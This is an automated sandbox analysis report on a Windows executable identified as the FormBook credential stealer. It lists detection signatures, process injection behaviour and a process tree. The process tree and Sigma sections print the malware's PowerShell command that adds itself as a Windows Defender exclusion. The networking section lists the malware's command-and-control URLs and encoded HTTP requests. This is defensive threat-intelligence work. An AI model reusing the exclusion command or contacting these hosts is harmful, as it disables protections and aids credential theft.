Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mKv3sKQ5Q4E7waF.exe

Overview

General Information

Sample name:mKv3sKQ5Q4E7waF.exe
Analysis ID:1640362
MD5:5e0360cda226b51b2ecd311012501c54
SHA1:2eba3545d3da64b1dc906373e542cfe2abd456f2
SHA256:0ffb85454f582cc85ee5b77282c62c16c3f845706a850fb2b096ce287494073f
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • mKv3sKQ5Q4E7waF.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe" MD5: 5E0360CDA226B51B2ECD311012501C54)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2692 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • mKv3sKQ5Q4E7waF.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe" MD5: 5E0360CDA226B51B2ECD311012501C54)
      • vnV7v1GankdEyS2eDT.exe (PID: 5768 cmdline: "C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\qX79VMgLV3tGr.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • help.exe (PID: 7036 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • vnV7v1GankdEyS2eDT.exe (PID: 4376 cmdline: "C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\Wzpz6Kyz4mz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7072 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 2848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ParentImage: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe, ParentProcessId: 6760, ParentProcessName: mKv3sKQ5Q4E7waF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ProcessId: 6920, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ParentImage: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe, ParentProcessId: 6760, ParentProcessName: mKv3sKQ5Q4E7waF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ProcessId: 6920, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ParentImage: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe, ParentProcessId: 6760, ParentProcessName: mKv3sKQ5Q4E7waF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe", ProcessId: 6920, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2848, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.urbagan.net/yas3/?-pKpW8DH=ACLzix20cds7up7/46wlnsk6Nsv7Q3fKxrYR6p4MvFRMrxvnqM2s8zT2fyP6MdeU99jzpRbWnk1TsskmEkSk+klaL10/tPDTZw0TZxu7M66aW95YiWhTdAsyQYGNea7whl19YBdcnHDA&h4NHh=CjqdRB50Avira URL Cloud: Label: malware
                Source: http://www.dresses-executive.sbs/iz5a/?-pKpW8DH=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCznnF7txmJdA6nURY4ZLjEDGE+TJ0tJRN2+G80EJqPAzx3giZePzIZpu5v&h4NHh=CjqdRB50Avira URL Cloud: Label: malware
                Source: http://www.9c555697-d77.cfd/amnq/?-pKpW8DH=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX60VE5hvGPdmJDr2mNsBNkDWCXKYr/xgONaH0k++AL0/KjcEIbPvoemI&h4NHh=CjqdRB50Avira URL Cloud: Label: malware
                Source: http://www.lingkungan.xyz/1vho/Avira URL Cloud: Label: malware
                Source: http://www.urbagan.netAvira URL Cloud: Label: malware
                Source: http://www.urbagan.net/yas3/Avira URL Cloud: Label: malware
                Source: http://www.dresses-executive.sbs/iz5a/Avira URL Cloud: Label: malware
                Source: http://www.warc.tech/eorp/Avira URL Cloud: Label: malware
                Source: http://www.lingkungan.xyz/1vho/?h4NHh=CjqdRB50&-pKpW8DH=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMWXJwM/R5wmPMsphCmlqyVD/VnC3OOQP4tqQTknru7tPs2zTypQNyu+OuAvira URL Cloud: Label: malware
                Source: http://www.9c555697-d77.cfd/amnq/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: mKv3sKQ5Q4E7waF.exeReversingLabs: Detection: 25%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: zpaD.pdbSHA256 source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: wntdll.pdbUGP source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: mKv3sKQ5Q4E7waF.exe, mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: help.pdbGCTL source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: zpaD.pdb source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290284490.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000000.1066377820.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0061C3D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0061C3D0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then xor eax, eax6_2_00609E10
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi6_2_0060E064
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then mov ebx, 00000004h6_2_030704F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.quantumxr.xyz
                Source: DNS query: www.lingkungan.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.bigjoy.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 77.222.42.122 77.222.42.122
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /s7xs/?h4NHh=CjqdRB50&-pKpW8DH=xcMJ8dHCBqmRN/v8A9X3SQFFEvK7hDYfq5HSOXvlsOwc7SqmLqODR0c7NEVchTWYh0j1Mb1wg8ygaKr+DeyKnKX/VFoWrG0/0to2sV5gOlXJrZtukXINp5PdkZYXOUWpsvbEdBUxzLQf HTTP/1.1Host: www.paoginbcn.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /bd6u/?-pKpW8DH=C699ZhSusvxhZ79sGIyx/jAntutNR/TTEg+UR4pbUkUSuK2bkyYOQkP8ElyXgHmB/M1sj/T1LBz/t4SesGYN437HCtRo9bJo6szGBS8vkx7LoKT/bHqa4TC4HXUD/hV5Q4SxqpDPRpa6&h4NHh=CjqdRB50 HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /amnq/?-pKpW8DH=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX60VE5hvGPdmJDr2mNsBNkDWCXKYr/xgONaH0k++AL0/KjcEIbPvoemI&h4NHh=CjqdRB50 HTTP/1.1Host: www.9c555697-d77.cfdAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /ra8c/?-pKpW8DH=FCJW9xjil5qugBSRiQA6TYMmKzFBES9fh1uxvnoCRwKx+kuUdPq0TiEctR6JEKFXsUKvjlQG/5hIwT1d+q0j/yyTKIQNakuol+DYV841VsXBTs/zYozRTx2KiZVGjhUiY58iKq5KEGNO&h4NHh=CjqdRB50 HTTP/1.1Host: www.thefounder.ceoAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /1vho/?h4NHh=CjqdRB50&-pKpW8DH=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMWXJwM/R5wmPMsphCmlqyVD/VnC3OOQP4tqQTknru7tPs2zTypQNyu+Ou HTTP/1.1Host: www.lingkungan.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /hb3t/?-pKpW8DH=9KXb6qBxMll9f4x2p0s5tKTO97R+nUCdHsPBbbY6H5bX94ZOqhaq0szPM69Abc7OasYSx8zxfbGo3o80iaP4ed5g4Ti6olHT9SxznxxBMTlQ0CRheWXTuutj8zxwZ69FGcNV0F6pXUDQ&h4NHh=CjqdRB50 HTTP/1.1Host: www.nexstep.liveAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /tjx1/?h4NHh=CjqdRB50&-pKpW8DH=TG2MQl+RzAjlK5FmB4vIzhZYom3se92/rpfSq0JUGMuU4ShRAQPdpLxTTwO0YSgd+qc50+/9J/dCy7dn7Bv3GAdvMpjdJpfd+8chARZ6BPh/No9Yy5eX8eWfjgCUaO2TCsF9Jby+rJ/P HTTP/1.1Host: www.031235045.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /freb/?-pKpW8DH=CrVXR/tglfI2Tw26jNQpKKBtePCBpzNCR35NxdnTgAeIWyg43F22Hb45FwdJBD3fE3YCNnYYiArhrGggW044LnZPRhD2gEKNoNKv/RNJOqIEPytCKbL3RbHBAGiHFXoGI2TcX3ZTQY9a&h4NHh=CjqdRB50 HTTP/1.1Host: www.truay.siteAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /0zpa/?-pKpW8DH=Arj7slIyYHdYIdItBvD/yug6zK1ulobzsX4Q/fC0Gb6wamVG7muUcu/e1DE+A+CXMGlNeQBc70XQmb9DcRsonJvjtdzRID2hXiWlnQRUwct2/YNVsyAKpOluH5xRyfz88tGlsKtx/XYu&h4NHh=CjqdRB50 HTTP/1.1Host: www.playav.mobiAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /eorp/?-pKpW8DH=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfE87V+mS69MNpvLKd/EpLTS6yxwIVBFJ/XpruYXDYUXYJbSgEKcgm0SJyZ&h4NHh=CjqdRB50 HTTP/1.1Host: www.warc.techAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /mik0/?-pKpW8DH=MZodc8OlGt8s8YeqJAB5YyMn8PO8JKHrs5+7JFO7C2wIMEQuo0OiAGAhRRReq0xMS+0PcdUJklm1hYNxl2dPE6zPsBmZ9ppGufPromwRxu5hQEGgj2uwENfLfGvU7GvMY+qWV8cblFlD&h4NHh=CjqdRB50 HTTP/1.1Host: www.448828.partyAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /iz5a/?-pKpW8DH=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCznnF7txmJdA6nURY4ZLjEDGE+TJ0tJRN2+G80EJqPAzx3giZePzIZpu5v&h4NHh=CjqdRB50 HTTP/1.1Host: www.dresses-executive.sbsAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /7ao9/?-pKpW8DH=0FCTgvFtttb/k3M7HElyhfE+VLi2VS+ZsM+qrGqWDjjgnBB1I9XqVJ2YzS96KRFB5ygIP+7H9rFjKFpZ8FUygvownFTL+yg1iooSOuAyiZIOTQmS00VXEe+NTm2b311PAKwxMK+gvSOH&h4NHh=CjqdRB50 HTTP/1.1Host: www.bigjoy.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /vrgg/?-pKpW8DH=0tsLL7PeGZ+MuFGr0RKEmyjy7iCQkNx0y+nhDKeS4rHoxyWsWUYtFIECofPisLkh7nEPrXMRdcFp7EDKjYXYHSSQd1LEjHxQFvDjar1skbum6JTSKq8y/ARbOypI5dDrQjDM0sB3C/xB&h4NHh=CjqdRB50 HTTP/1.1Host: www.klass.teamAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /1hc0/?-pKpW8DH=qe5zJE97Y1Od+1YRU3JU1DJQ64YgQhmRIfUAmxXzD+vXbpn92cvHcFVamkgodqv0YEztxSYAbCj5dzR2TtR9TzcP+/xPPbxPboOsD6tpgl9cgrlKfZviUapeY6RkqHsd0IrBGJCMPKCq&h4NHh=CjqdRB50 HTTP/1.1Host: www.calimade.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /yas3/?-pKpW8DH=ACLzix20cds7up7/46wlnsk6Nsv7Q3fKxrYR6p4MvFRMrxvnqM2s8zT2fyP6MdeU99jzpRbWnk1TsskmEkSk+klaL10/tPDTZw0TZxu7M66aW95YiWhTdAsyQYGNea7whl19YBdcnHDA&h4NHh=CjqdRB50 HTTP/1.1Host: www.urbagan.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficDNS traffic detected: DNS query: www.paoginbcn.net
                Source: global trafficDNS traffic detected: DNS query: www.quantumxr.xyz
                Source: global trafficDNS traffic detected: DNS query: www.9c555697-d77.cfd
                Source: global trafficDNS traffic detected: DNS query: www.thefounder.ceo
                Source: global trafficDNS traffic detected: DNS query: www.lingkungan.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nexstep.live
                Source: global trafficDNS traffic detected: DNS query: www.031235045.xyz
                Source: global trafficDNS traffic detected: DNS query: www.truay.site
                Source: global trafficDNS traffic detected: DNS query: www.playav.mobi
                Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                Source: global trafficDNS traffic detected: DNS query: www.448828.party
                Source: global trafficDNS traffic detected: DNS query: www.dresses-executive.sbs
                Source: global trafficDNS traffic detected: DNS query: www.bigjoy.xyz
                Source: global trafficDNS traffic detected: DNS query: www.klass.team
                Source: global trafficDNS traffic detected: DNS query: www.calimade.net
                Source: global trafficDNS traffic detected: DNS query: www.urbagan.net
